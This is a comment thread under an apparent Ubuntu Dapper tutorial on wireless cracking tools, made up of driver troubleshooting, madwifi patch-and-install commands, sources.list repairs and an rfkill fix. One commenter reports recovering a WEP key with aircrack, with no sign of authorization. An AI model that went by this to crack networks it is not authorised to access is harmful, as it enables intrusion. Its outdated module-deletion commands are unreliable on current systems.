product: RTL8101E/RTL8102E PCI Express Fast Ethernet controller
vendor: Realtek Semiconductor Co., Ltd.
physical id: 0
bus info: pci@0000:04:00.0
logical name: eth0
version: 02
serial: 00:1e:ec:e3:99:0d
size: 100MB/s
capacity: 100MB/s
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation
configuration: autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3LK-NAPI duplex=full latency=0 link=yes multicast=yes port=MII speed=100MB/s
resources: irq:46 ioport:3000(size=256) memory:93410000-93410fff memory:93400000-9340ffff memory:93420000-9343ffff
**************************

Guys help me……… I am very new to these things…………..

Please tell me the url of the patch driver…………

 
themaker November 16, 2010 Reply

hi I have windows vista and managed to get a wep key using aircrack 1.1 and aircrack rc4 and commview for wifi and both aircracks gave the same key but it is not in ascii (e.g. 23:12:12:34:23), also i tried to use the key without the colons in the network and sharing center but it also doesnt work.. can anyone tellme if i can get a converter from whtever form it is (honestly im a noob in this and dont know much)

 
debindas November 26, 2010 Reply

debin-pc@ubuntu:~$ sudo gedit /etc/apt/sources.list
debin-pc@ubuntu:~$ sudo apt-get update
E: Type ‘Read’ is not known on line 72 in source list /etc/apt/sources.list
E: The list of sources could not be read.

Plz explain me the error…why i am getting this after following the step.

 
J January 10, 2011 Reply

Anyone tell me please where is the aircrack data.cap is store coz i dint find it in home dir or inside aircrack dir, I even search for the file only ext .cap but no result. a little help plz

 
Exicos February 8, 2011 Reply

how do i have to instal the package below using the terminator? the madwifi.zip file is in the downloads folder that fire fox uses?

http://dl.dropbox.com/u/330655…..adwifi.zip

and thank you :)

 
 
UbuntuLinuxHelp February 22, 2011 Reply

@Exicos

Yes, use terminal. Make backups of your system FIRST. Also, this post was written for Ubuntu Dapper

 
Exicos February 8, 2011 Reply

how do i have to instal the package below using the terminator? the madwifi.zip file is in the downloads folder that fire fox uses..

http://dl.dropbox.com/u/330655…..adwifi.zip

and thank you :)

 
 
UbuntuLinuxHelp February 22, 2011 Reply

@Exicos

Please note: This post was written for Ubuntu Dapper

sudo -i

cd /usr/src
wget http://*******PLEASE SEE COMMENTS FOR URL'S*******
wget http://*******PLEASE SEE COMMENTS FOR URL'S*******

ifconfig ath0 down
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
find /lib/modules -name ‘ath*’ -exec rm -v {} ;
find /lib/modules -name ‘wlan*’ -exec rm -v {} ;

tar zxvf madwifi-cvs-20051025.tar.gz
cd madwifi
patch -Np1 -i ../madwifi-cvs-20051025.patch
make && make install

modprobe ath_pci

 
exicos February 8, 2011 Reply

please what is the final madwifi package to dl? and how to install it…

thank you

 
 
UbuntuLinuxHelp February 22, 2011 Reply

@exicos

I’m not reading the post right now, but I’m pretty sure the answer is in the comments (with download links) – Thanks

 
kyo ono March 28, 2011 Reply

I modified the repository list and it doesnt work any more hahahahaha can one of you guys post its sources.list so I can change it the way it was before Im new in linux or where can i get it from? I use linux mint 10 julia

 
 
UbuntuLinuxHelp March 29, 2011 Reply

@kyo ono

ALWAYS back up files BEFORE editing them. ;)

I’m not a Mint user (I use Ubuntu), so have no copies of any current Mint sources.list. However, you may have some luck looking at http://forums.guru3d.com/showthread.php?p=3771110, where they post the following sources.list for Mint:

deb http://packages.linuxmint.com/ julia main upstream import
deb http://archive.ubuntu.com/ubuntu/ maverick main restricted universe multiverse
deb http://archive.ubuntu.com/ubuntu/ maverick-updates main restricted universe multiverse
deb http://security.ubuntu.com/ubuntu/ maverick-security main restricted universe multiverse
deb http://archive.canonical.com/ubuntu/ maverick partner
deb http://packages.medibuntu.org/ maverick free non-free
#deb http://archive.getdeb.net/ubuntu maverick-getdeb apps
#deb http://archive.getdeb.net/ubuntu maverick-getdeb games

Make sure you compare the above and the resources found at the above URL, with your existing sources.list and make corrections.

Again, ALWAYS back up files BEFORE editing them.

 
oggie April 20, 2011 Reply

I tried this on an hp dv2000 laptop with it’s built in broadcom BCM4311 wireless and ubuntu 10.10 64bit. Afterwards, network manager would no longer detect any wifi networks. I tried everything to fix it.

So I reinstalled Ubuntu 10.10 (reformat of the drive) and the problem persists… how is that possible? Did it put the nic in some unusable state?

lwconfig shows that the mode is managed… Any ideas?

 
 
UbuntuLinuxHelp May 2, 2011 Reply

@oggie

This was written for Ubuntu 6.06, not Ubuntu 10.10. Maybe there’s another file in your system that was edited? It’s hard to see what the issue for you might be, when we don’t know what the issue really is.

 
James April 27, 2011 Reply

I’m Reading your tutorial, still working my way through it and I’m stuck on the madwifi driver part. Not the installation part but the actual NECESSITY of it. This is the second system i have Ubuntu on, the first one was karmic koala and on my new laptop has maverick. On my first laptop i had a hell of a time getting the wireless driver to work and the madwifi driver made it worse. So i have a little grudge against it lol.
So to recap do i REALLY have to replace the wireless driver if mine already works?

 
 
UbuntuLinuxHelp May 2, 2011 Reply

@James
This was written for a much older version of Ubuntu, Dapper. This version is not for Karmic.

 
oggie May 4, 2011 Reply

I don’t know what happened, but I figured how to fix my problem I referenced before.

I had to install rfkill:
sudo apt-get install rfkill

and then:
rfkill unblock all

And everything started working as normal again.

 
kyou May 13, 2011 Reply

in the part where it says

wget http://*******see comments for URLS*********

what URLs??

thanks in advance.

 
 
UbuntuLinuxHelp May 13, 2011 Reply

@kyou
The comments contain links to some of the packages. It looks like some readers have provided updated links to them. Thanks. :)

 
ngeves July 7, 2011 Reply

My laptop “dv2000″ suddenly had a issue and was showing that wireless switch is off. but rfkill unblock all command solved it.

Thanks for the solution

Leave a Reply

close comment popup

Leave A Reply